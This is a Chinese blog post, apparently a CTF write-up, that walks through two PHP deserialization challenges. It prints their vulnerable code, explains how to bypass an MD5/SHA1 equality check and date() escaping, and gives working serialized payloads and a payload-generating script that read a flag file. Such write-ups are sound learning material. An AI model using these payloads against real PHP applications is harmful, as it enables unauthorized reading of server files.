(反序列化)小记录

已于 2023-12-09 14:39:53 修改
阅读量779 收藏 10
点赞数 12
分类专栏: web反序列化 文章标签: 网络 学习 web php
于 2023-12-09 13:19:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/134893842
版权

 

目录

 [CISCN 2023 华北]ez_date

绕过MD5和sha1强相关绕过

date()绕过

payload

[FSCTF 2023]ez_php

 [CISCN 2023 华北]ez_date

<?php
error_reporting(0);
highlight_file(__FILE__);
class date{
    public $a;
    public $b;
    public $file;
    public function __wakeup()
    {
        if(is_array($this->a)||is_array($this->b)){
            die('no array');
        }
        if( ($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b)) ){
            $content=date($this->file);
            $uuid=uniqid().'.txt';
            file_put_contents($uuid,$content);
            $data=preg_replace('/((\s)*(\n)+(\s)*)/i','',file_get_contents($uuid));
            echo file_get_contents($data);
        }
        else{
            die();
        }
    }
}

unserialize(base64_decode($_GET['code']));

不能用数组绕过,且a不能等于b,a、b的md5和sha1的值要强相关相等

date函数会对特定的字母转化为特定的时间表达格式

把file的内容进行date函数处理当作数据,uniqid的数据作文件名

        uniqid()是PHP中的一个函数,用于生成唯一的字符串。它可以带一个可选的前缀参数和一个用于指定是否使用更多的熵的布尔类型的参数。

        当没有任何参数传入uniqid()函数时,它会生成一个基于当前时间微秒数的唯一字符串。如果在同一微秒内调用uniqid()函数多次,则会生成不同的字符串,因为它还会添加一个随机数,以防止生成重复的字符串。

        如果指定了前缀参数,则生成的字符串将以该前缀开头。例如,uniqid('prefix_')可能会生成类似于prefix_5f9a1d1bcb6c2的字符串。前缀参数通常用于生成特定的唯一标识符,例如用于数据库表的主键。

        第二个参数用于指定是否使用更多的熵来增加生成唯一字符串的难度。如果设置为true,则会添加额外的信息(如当前进程ID、线程ID或时间戳)来生成更长的唯一字符串。

之后对这个文件进行正则表达式的替换

正则表达的解释

绕过MD5和sha1强相关绕过

($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a)=== sha1($this->b))

1.用原生类error绕过

网上说可以,但是一些大佬说不过不知为何php8下可用, 放到5和7不可用, 题目貌似也是7, 这条路走不通

2.数字型和字符型的绕过

由于前面是!==,所以第一个判断数字型和字符型是1

date()绕过

对里面的字符加反斜杠防止转义

如上图

payload

<?php
class date{
    public $a=1;
    public $b='1';
    public $file='/f\l\a\g';
}
$c=new date;
echo base64_encode(serialize($c));

结果
Tzo0OiJkYXRlIjozOntzOjE6ImEiO2k6MTtzOjE6ImIiO3M6MToiMSI7czo0OiJmaWxlIjtzOjg6Ii9mXGxcYVxnIjt9

[FSCTF 2023]ez_php1

进入题目

第一个数组绕过

第二个随便FL_AG=1,得到提示!!!Congratulation!!L0vey0U.php

解释一下正则表达式

preg_match('/^.*(flag).*$/', $ja)

进到L0vey0U.php

L0vey0U.php?str=s:10:"YES I love";

得到P0int.php

进到P0int.php

 <?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?>

这里应该输出$a的值,而不是$b的值

用引用的方法

O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}

r为2代表是第二个反序列化元素被引用

_MOB_
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 1万+
2023全国大学生信息安全竞赛(ciscn)部分题解
反序列化(二) (略详细)
qq975353472的博客
11-13 474
反序列化(二) (略详细) 前文讲了讲__wakeup绕过,注入对象构造方法,和session反序列化。 链接为: https://blog.csdn.net/qq975353472/article/details/109657666 这里就讲讲剩下的两种,一个是phar反序列化(推荐先去学习phar用法),和pop链构造(重点哦) 一、Phar反序列化(个人感觉漏洞类型是文件包含+文件上传) 影响函数 fileatime / filectime / filemtime stat / fileinode /
ciscn2023华北赛区
……
06-29 922
利用点在这里的os.system函数。这里的savepath是我们可控的,通过修改文件名就可以控制savepath的值,所以在os.system函数中拼接系统命令,本地运行进行调试。看到在本地是执行了命令的,但是页面上没有回显,考虑弹shell,因为不允许一些符号使用,所以用base64编码一下。利用不同类型a=1和b='1’绕过强等判断。这里通过’'符号来绕过,/f\l\a\g。这里禁止了通过数组绕过md5的方法。反序列化触发wakeup函数。payload拿到原题。
[CISCN 2023 华北]pysym
最新发布
rev1ve的博客
11-17 515
分析一下,首先检查上传文件是否为空以及文件大小,对文件名进行路径拼接,然后给出上传成功后随机的文件路径,try命令执行tar解压文件,这里存在RCE漏洞,我们可以利用。除此之外,发现当savepath包含一些特殊字符时会引发file.save(savepath)报错,用base64避免。因为os.system是无回显的,我们尝试反弹shell。随便上传一个文件,bp抓包修改文件名。
NSSCTF web刷题记录3
rev1ve的博客
10-28 666
使用 uniqid() 生成一个唯一的标识符,并将其与 .txt 扩展名拼接为文件名,赋值给变量 $uuid;这里关键是要去得到cookie_secret的值,借助百度,Tornado框架的附属文件handler.settings中存在cookie_secret,修改下payload。我们要把flag复制到app.py,但是我们不知道当前目录是什么,所以多尝试看看需要几个。分别赋值即可绕过,那么我们再来看看date函数,我们本地测试下。,然后结合存在app.py,我们用cp命令把。
2023 CTF国赛初赛(CISCN) re- ez_byte
qq_54894802的博客
05-30 1485
我们跳到数据区,发现这个100%下面的,yes并没有在string窗口出现,我们按下x查询交叉引用,在执行yes之前,有个jmp指令,也就是说,按照程序执行是永远不好去到yes的地方的,也就是说,一定有什么操作,然后再跳到yes中去。在前面,我们分析了,对r12的操作,并没有直接出现在代码上,操作代码被隐藏了。为此,我们可以大致猜测就是运行程序,触发一个异常,然后通过此条转到想要操作的地方,进行操作,通过题目描述,应该就是嵌入了一堆字节码。我们查看判断跳入,yes的汇编,我们可以发现,
学习笔记01-序列化与反序列化
wangyz_008的博客
10-26 139
序列化与反序列化 C/C++中实现手工序列化 调用MFC框架实现序列化和反序列化
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
weblogic反序列化.zip
07-08
1. 禁用不受信任的反序列化:修改WebLogic配置,限制哪些类可以被反序列化,或者禁用不必要的反序列化功能。 2. 部署入侵检测系统:使用入侵检测系统(IDS)或入侵防御系统(IPS)监控网络流量,识别并阻止恶意的...
python序列化反序列化和异常处理笔记.doc
10-01
Python的序列化与反序列化是将数据结构或对象转换为可存储或传输的格式,然后再次转换回原数据的过程。这一过程对于保存程序状态、跨进程通信、数据持久化等场景非常有用。Python提供了多种序列化库,如pickle、json...
delphi序列化与反序列化
09-15
在IT行业中,序列化和反序列化是两个关键的概念,特别是在对象持久化、数据传输以及存储方面。在Delphi编程环境中,这两个概念同样至关重要。本文将深入探讨Delphi中的序列化与反序列化,以及如何处理组件和结构体的...
delphi_JSON序列化反序列化
10-12
本篇将深入探讨Delphi中的JSON序列化和反序列化技术。 一、JSON简介 JSON是一种独立于语言的数据表示格式,它基于ECMAScript的一个子集。一个有效的JSON对象通常包含键值对(key-value pairs)的集合,数组或其他...
详解Python中的序列化与反序列化的使用
09-21
Python中的序列化与反序列化是将对象的状态转化为可存储或传输的形式,以便于之后恢复对象的状态。在Python中,序列化通常用于保存程序状态、跨进程通信或在网络上传输数据。本文主要介绍的是Python标准库中的pickle...
json序列化反序列化table
05-04
根据给定的信息,本文将详细解释JSON序列化与反序列化的概念,并且聚焦于如何在.NET框架中实现Table数据结构的序列化与反序列化。 ### JSON 序列化与反序列化的概念 #### 什么是 JSON? JSON(JavaScript Object ...
详解Python 序列化Serialize 和 反序列化Deserialize
09-21
Python的序列化(Serialization)和反序列化(Deserialization)是编程中常用的数据转换技术,它们主要用于将数据对象转换成可存储或传输的形式,然后再还原回原来的对象。这对于数据持久化、跨进程通信以及网络传输...
ciscn2023-web 总结与思考
m0_64348326的博客
05-29 498
1.一开始本以为是一个简单的dump界面的命令注入,因为猜测源语句可能是先执行命令读取创建日志信息,然后file_get_contents写入/log/目录中。所以一开始就在读取的table_2_dump参数中进行fuzz,发现很多能用来执行命令的符号,例如反引号、$、|、;均被过滤了,不过尝试换行符成功了,于是尝试执行env成功在环境变量中找到了flag。2.赛后才知道这是非预期解,预期是。官方文档中说明了这是一个备份程序,在shell中可以执行备份操作,安装的mysqldump就是链接到该程序中的。
2022年强网杯rcefile wp
weixin_52829570的博客
08-01 1158
查看源码中config.inc.php,发现对cookie做了反序列化,并存在spl_autoload_register()函数。所以上传一个phar文件,并把Content-Type改成image/png。常见的大小写绕过,空格绕过,php4这种都可以绕过成功上传,但都不解析。cookie的userfile就是上传文件加密过的文件名来构造序列化。知道了flag的位置所以我们重新上传一个catflag的inc文件。带着构造的cookie进行访问可以看到代码被执行了。O32"文件名"0{}...
ciscn2023初赛 writeup
S4n_v1的博客
05-28 3014
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
阿里云CTF2023 字节码跳动 wp (javascript字节码)
weixin_42100211的博客
04-23 1199
我的第一道javascript字节码逆向。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值